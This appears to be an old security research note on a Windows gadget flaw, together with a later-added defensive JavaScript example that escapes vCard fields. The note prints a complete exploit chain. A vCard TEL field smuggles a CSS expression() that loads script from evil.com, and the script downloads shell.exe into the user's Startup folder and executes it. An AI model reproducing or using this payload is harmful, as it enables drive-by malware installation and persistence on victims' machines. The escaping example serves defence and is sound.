2007 08 29 0x000b GAMMAH Notes

So here are the details on it:

The vcard looks like this:
BEGIN:VCARD
VERSION:3.0
FN:Inspector Gadget
TEL;type=HOME:' style='c:expression(document.all[document.all.length-1].src="http://evil.com/file.js")
END:VCARD

The contents of file.js:
var url="http://evil.com/shell.exe";
var path=System.Environment.getEnvironmentVariable("APPDATA") + "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\shell.exe";
var x = new XMLHttpRequest();
x.open("GET", url, true);
x.send();
var a = new ActiveXObject("ADODB.Stream");
a.Type = 1;
a.Open();
a.Write(x.responseBody);
a.SaveToFile(path, 2);
a.Close;
a = null;
System.Shell.execute(path);

This saves shell.exe to the user's startup folder, then runs it.
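
The defensive side of the TEL line above, as an added example that is not part of the original notes: it parses a vCard, flags property values carrying quote characters or a CSS expression() call, and shows the same value rendered raw and HTML-escaped. It assumes the gadget writes the TEL value into a single-quoted HTML attribute (the notes do not show the rendering code); all function names are hypothetical and the sample card is constructed with an inert placeholder.

```javascript
// Added example: hypothetical helper names; the vCard below is a constructed
// sample with an inert placeholder value shaped like the one in the note.
const SAMPLE_VCARD = [
  "BEGIN:VCARD",
  "VERSION:3.0",
  "FN:Inspector Gadget",
  "TEL;type=HOME:' style='c:expression(PLACEHOLDER)",
  "END:VCARD",
].join("\r\n");

// Split "NAME;params:value" content lines; the value is everything after the first colon.
function parseVcard(text) {
  const props = [];
  for (const line of text.split(/\r?\n/)) {
    const idx = line.indexOf(":");
    if (idx < 1) continue;
    const [name, ...params] = line.slice(0, idx).split(";");
    props.push({ name: name.toUpperCase(), params, value: line.slice(idx + 1) });
  }
  return props;
}

// Escape for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Flag values that carry markup-significant characters or a CSS expression() call.
function suspiciousProps(props) {
  const pattern = /['"<>]|expression\s*\(/i;
  return props.filter((p) => !["BEGIN", "END"].includes(p.name) && pattern.test(p.value));
}

// Assumed rendering: the value lands in a single-quoted attribute.
function renderTel(value, escape) {
  const v = escape ? escapeHtml(value) : value;
  return "<span title='" + v + "'>phone</span>";
}

const props = parseVcard(SAMPLE_VCARD);
const tel = props.find((p) => p.name === "TEL");
console.log(renderTel(tel.value, false)); // a separate style attribute appears
console.log(renderTel(tel.value, true));  // quotes encoded, value stays inside title
console.log(suspiciousProps(props).map((p) => p.name));
```

Escaping at output is the fix; the flagging function is only a triage aid for cards that arrive from untrusted sources.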
